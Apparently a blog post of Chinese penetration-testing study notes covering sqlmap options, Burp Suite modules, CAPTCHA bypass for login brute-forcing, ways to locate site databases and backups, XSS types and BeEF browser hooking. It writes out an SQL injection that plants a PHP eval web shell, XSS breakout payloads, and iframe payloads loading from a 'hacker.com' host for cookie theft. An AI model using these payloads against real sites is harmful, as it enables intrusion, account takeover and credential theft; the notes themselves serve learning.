sqlmap续
sqlmap续
注入语句(知道绝对路径时候可用)
http://192.168.99.171/test2/sqli/example10.php?catid=3’union select 1,’<? @eval($_POST[xy])?>’,3,4 into outfile ‘C:/xampp/htdocs/test2/xinyu2.php‘--+
检测注入:http://192.168.99.171/test/xinyu2.php若有返回内容则已经写入
form表单
--random-agent 随机请求
--cookie=COOKIE 身份赋予
--technique=TECH SQL injection techniques to use (default "BEUSTQ")T时间E错误C
--dns-domain=DNS.. Domain name used for DNS exfiltration attack
--DNS域=DNS..用于DNS渗出攻击的域名
burp与wireshark的区别
http协议抓包工具burp,能改能发,实时互动
wireshark不能改只能抓住
burp:
target(目标) proxy(代理) spider scanner intruder repeater sequencer decoder compare extend options
详情:
https://blog.csdn.net/lynnlinlin/article/details77488947/
http://blog.csdn.net/lynnlinlin/article/details/76736972
http://blog.csdn.net/lynnlinlin/article/details/77480726
1) Proxy(代理)
代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,修改代理配置. 在这里我们可以编辑代理正在监听的端口.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。这意味着在同一网络中的任何计算机都可以使用Burp Proxy功能成为代理,并中继通过它的流量. "support invisible proxying for non-proxy-aware client"选项是用于客户端不知道他们使用的是代理的情况下.这意味着代理设置不是设置在浏览器,有时候设置在hosts文件中.在这种情况下,和将代理选项设置在浏览器本身所不同的是Burp需要知道它是从一个非代理客户端接收流量的."redirect to host"和"redirect to port"选项将客户端重定向到我们在该选项后设置的主机和端口。 这里有个选项用来修改从响应中接收到的html网页。我们可以取消隐藏的表单字段,删除javascript等。还有一个选项用自定义字符串替换掉寻找到的特定的模式.我们需要用指定正则表达式。Burp将解析请求或者响应以期望能够寻找到这种模式,将会用自定义的字符串来替换它.一旦Burp Spider提交一个登陆表单的时候就开始爬行(抓取).它可以自动提交我们提供给它的证书.我们同样可以设置admin/password凭证,设置好之后,他们会做为DVWA中的凭证.因此Burp Spider可以自动提交那些信息凭证,并且保持爬行抓取的状态希望能够获得更多的新的信息.你也可以在thread(线程)项来修改线程数. 这样就会启动Burp Spider,在Spider control标签下我们会看到正在做出的请求,我们也可以为Burp Spider自定义一个范围.
2)Intruder(入侵)
Burp Intruder可以用于利用漏洞,模糊测试,暴力猜解等。在这种情况下我们将使用Burp Suite的Intruder对DVWA进行暴力猜解攻击.浏览到DVWA,单击"Burp Force(暴力猜解)",随便输入username和password,确保Burp Suite上的"intercept is on(监听是打开的)".然后点击登陆 以上的操作会将请求信息发送给intruder功能.进入intruder标签,配置Burp Suite来发起暴力猜解的攻击.在target标签下可以看到已经设置好了要请求攻击的目标 单击右边的"clear"按钮,将会删除所有用不同颜色演示的重要的信息.接下来我们需要配置Burp在这次攻击中只把用户名和密码做为参数.选中本次请求中的username(本例中用户名是指"infosecinstiture")然后单击"Add(添加)".同样的将本次请求中的password也添加进去.这样操作之后,用户名和密码将会成为第一个和第二个参数.一旦你操作完成,输出的样子应该如下图所示: 接下来我们需要设置这次攻击的攻击类型,默认情况下的攻击类型是"Sniper(狙击手)",在本例中,我们将使用"Cluster Bomb(集束炸弹)"的攻击类型.有四种攻击类型,分别是singer,battering ram,pitchfork,cluster bomb.下图中我们看到的我们的攻击类型是"Cluster Bomb' 进入payload标签,确保"payload set"的值是1,点击"load(加载)"加载一个包含用户名的文件 。本例中我们使用一个很小的文件来进行演示.加载之后用户名文件中的用户名会如下图所示 同样设置"payload set"的值为2,点击"load"加载一个密码字典文件。 进入"options"标签,确保results下的"store requests"和"store responses"已经选择.
3)Repeater(中继转发) 通过Burp Repeater功能,我们可以手动修改一个请求,并且发送出去,来分析返回的响应.我们需要从不同的地方发送请求给Burp Repeater,比如入侵者,代理等.发送一个请求给Repeater,只需要单击右键"send to Repeater". 点开Repeater标签,会看到request,也可以看到名为1,2,3的3个标签. 我们也可以看到requestparams,header,hex和raw格式的请求,发送请求之前,我们可以修改其中的任何一个. 只修改Params请求下的username=admin,password=password,点击go,这样就会发送这个请求. 我们可以分析response部分返回的响应.
fuzz(模糊测试)
文件上传
第一个被检测而第二个不被检测
双文件上传
inurl:/ewebeditor.mdbà查找数据库
1.管理员后台
2.整站的rar压缩包(***.rar||***.zip)à代码审计
3.编辑器页面 和编辑器管理员后台à弱口令à文件上传
4.留言板à留言板后台à弱口令à文件上传
5.整站,编辑器,留言板的mdb数据库文件à下载数据库获得用户名密码
6.bak后缀文件(网站源码的备份文件)à拿到网站源码
7.其他攻击者留下的木马à破解密码登录
8.网站安装时留下的说明文件à敏感目录和初始用户名密码
GET POST
GET--》HEAD
index.php登录进去的界面
login.php登录界面
admin/verifycode.php验证代码(丢弃它)
绕过验证码(cookie)(burp)【刷新无效】à爆破登录
- 原理:验证码往往是单独的一个请求,如果不让它跳转就一直有效(丢弃验证的)
- 过程:
- 启动burp和一个打开的登录界面
- 在repeater里放弃一个验证的请求
- 到了提示密码错误或者用户名错误而不是验证码错误的时候,你就成功了
- 然后开始进行用户名密码爆破(用户名可以写一些注入语句)
- 比对长度查看与众不同的就是
- 注意:速度别太快…数据库会哭死的
脑痛的同源策略(约定判断四要素,cookie)
1.host(域名或ip地址,如果是ip地址则看做一个根域名)
2.子域名
3.端口
4.协议
流动ip
花生壳(动态dns解析)内网穿刺(带你的木马找到回家的路)
以及,FQ…
神奇的xss(精通JavaScript):
1.xss的原理:
脚本会在用户的浏览器上执行,从而达到攻击者的各种目的。
客户端嵌入恶意脚本代码
2.xss类型:
(1)反射型
(2)存储型
(3)本地型(dom型)
1.反射型:(php网页)
(1)恶意的客户端代码(html/javascript),是在服务器端合成的
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
2.本地型(dom型):
DOM:document对象,是在JavaScript当中的一种元素
(1)恶意的客户端代码(html/javascript),是在浏览器端合成的
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
3.存储型:
(1)恶意的客户端代码(html/javascript),存入数据库,或其他持久化形式
(2)客户输入什么,不做检测,直接原样在客户端显示和执行
(3)恶意代码在服务器端合成
beef神器
防beef静止浏览器多次请求,进行360防御-.-
使用详情http://netsecurity.51cto.com/art/201307/402179.htm
BeEF是浏览器攻击框架的简称,是一款专注于浏览器端的渗透测试工具。
beef beef
假设此时目标192.168.11.1的服务器访问了这个demo页面
http://192.168.11.152:3000/demos/basic.html。则就被hook上了,
实施攻击 HOOK持续的时间为关闭测试页面为止。在此期间,相当于被控制了,可以发送攻击命令了。选择commands栏,可以看到很多已经分好类的攻击模块。 其中,4种颜色分别表示: 该攻击模块可用,且隐蔽性强 该攻击模块可用,但隐蔽性差 该用户模块是否可用还有待验证 该攻击模块不可用
username=[X]
xss:
闭合:
"><script>alert(1)</script>
"/></textarea><script>alert(1)</script>
注意观察网页源码来使其闭合
xss盗取cookie
cookie即为身份,交流的牌牌,有一个其他人的身份你就成了其他人,然后一不小心就浏览到了后台页面
xss注入点:任意的输入位置,有输入,就有xss。
xss语句
<iframe src="http://www.hacker.com/xss/dy.html" height="400" width="100%" scrolling="no" frameborder="0"></iframe>
<iframe src="http://www.hacker.com//xss/login.html" height="100%" width="100%" scrolling="no" frameborder="0" style="position:absolute;top:0;margin:0;padding:0;left:0;
z-index:99999999;"></iframe>
短网址生成
sqlmap续的更多相关文章
- ORM查询语言(OQL)简介--高级篇(续):庐山真貌
相关文章内容索引: ORM查询语言(OQL)简介--概念篇 ORM查询语言(OQL)简介--实例篇 ORM查询语言(OQL)简介--高级篇:脱胎换骨 ORM查询语言(OQL)简介--高级篇(续):庐山 ...
- .Net Core MVC 网站开发(Ninesky) 2.3、项目架构调整(续)-使用配置文件动态注入
上次实现了依赖注入,但是web项目必须要引用业务逻辑层和数据存储层的实现,项目解耦并不完全:另一方面,要同时注入业务逻辑层和数据访问层,注入的服务直接写在Startup中显得非常臃肿.理想的方式是,w ...
- [.NET] C# 知识回顾 - 委托 delegate (续)
C# 知识回顾 - 委托 delegate (续) [博主]反骨仔 [原文]http://www.cnblogs.com/liqingwen/p/6046171.html 序 上篇<C# 知识回 ...
- 关于sqlmap的使用
好记性不如烂笔头,记录一下. 带cookie的注入 python sqlmap.py -u "http://www.xxx.com?id=1" --cookie="coo ...
- iOS 开发者账号到期续费流程
1.登录developer.apple.com,查看到期时间 2.到期提醒通知,点击Renew Membership续费(一般提前一个月提醒续费) 3.个人开发者账号续费需要支付 688人民币/年(9 ...
- SQLMap Tamper Scripts Update 04/July/2016
SQLMap Tamper Scripts Update apostrophemask.py Replaces apostrophe character with its UTF-8 full wid ...
- 定制sqlmap tamper脚本
前言 渗透测试过程中遇到注入点常常丢到sqlmap中进行测试,假如网站有waf,sqlmap便无法直接注入了. 测试 在测试某个项目的过程中,一个页面的aid参数,习惯性的提交 and 1=1发现直接 ...
- sqlmap --dns-domain模拟实践
因为看到乌云的这一篇文章 http://drop.xbclub.org/static/drops/tips-5283.html 里面的提到的用sqlmap 的--dns-domain 进行dns 注入 ...
- 微信公众号开发系列教程一(调试环境部署续:vs远程调试)
http://www.cnblogs.com/zskbll/p/4080328.html 目录 C#微信公众号开发系列教程一(调试环境部署) C#微信公众号开发系列教程一(调试环境部署续:vs远程调试 ...
随机推荐
- SYN4102型 GPS同步时钟
SYN4102型 GPS同步时钟 产品概述 SYN4102型GPS同步时钟是由西安同步电子科技有限公司精心设计.自行研发生产的一款高精度锁相时钟频率源,接收GPS信号,使恒温晶振输出频率同步于GPS ...
- java集合框架collection(6)继承结构图
根据<java编程思想>里面的说法,java集合又叫容器,按照单槽和双槽分为两类,Collection和Map,这两个都是接口. 一.Collection Collection下面又分了三 ...
- spring 5.x 系列第16篇 —— 整合dubbo (代码配置方式)
文章目录 一. 项目结构说明 二.项目依赖 三.公共模块(dubbo-ano-common) 四. 服务提供者(dubbo-ano-provider) 4.1 提供方配置 4.2 使用注解@Servi ...
- python基础--定义装饰器(内置装饰器)
装饰器的定义: 装饰器本质上就是一个python函数,它可以让其它函数在不需要做任何代码改动的前提下增加额外的功能,装饰器的返回值也是一个函数对象.它经常用于有切面需求的场景中,比如-- >插入 ...
- 【过时】项目转Maven后出现的问题记录
上图,文字后补充 1.过程 创建一个新的web项目,项目名称与原项目名称一致.注意勾选“添加mvn支持(红框部分)”,勾选后运行目标服务器会变为none,这里无法进行添加. 2.项目创建完成后,会报错 ...
- Dungeon Master POJ - 2251(bfs)
对于3维的,可以用结构体来储存,详细见下列代码. 样例可以过,不过能不能ac还不知道,疑似poj炸了, #include<iostream> #include<cstdio> ...
- 巧妙解决element-ui下拉框选项过多的问题
1. 场景描述 不知道你有没有这样的经历,下拉框的选项很多,上万个选项甚至更多,这个时候如果全部把数据放到下拉框中渲染出来,浏览器会卡死,体验会特别不好 用人会说element-ui的select有一 ...
- 02-三种Bean装配机制(一)
Spring要创建哪些bean并且如何将其装配在一起,现有的,主要是三种装配机制: 自动化装配 通过java代码装配 通过XML装配 这三种装配机制可以互相搭配使用,即是可以共存的.接下来就分别介绍啦
- HDU 1565:方格取数(1)(最大点权独立集)***
http://acm.hdu.edu.cn/showproblem.php?pid=1565 题意:中文. 思路:一个棋盘,要使得相邻的点不能同时选,问最大和是多少,这个问题就是最大点权独立集. 可以 ...
- Codeforces 778A:String Game(二分暴力)
http://codeforces.com/problemset/problem/778/A 题意:给出字符串s和字符串p,还有n个位置,每一个位置代表删除s串中的第i个字符,问最多可以删除多少个字符 ...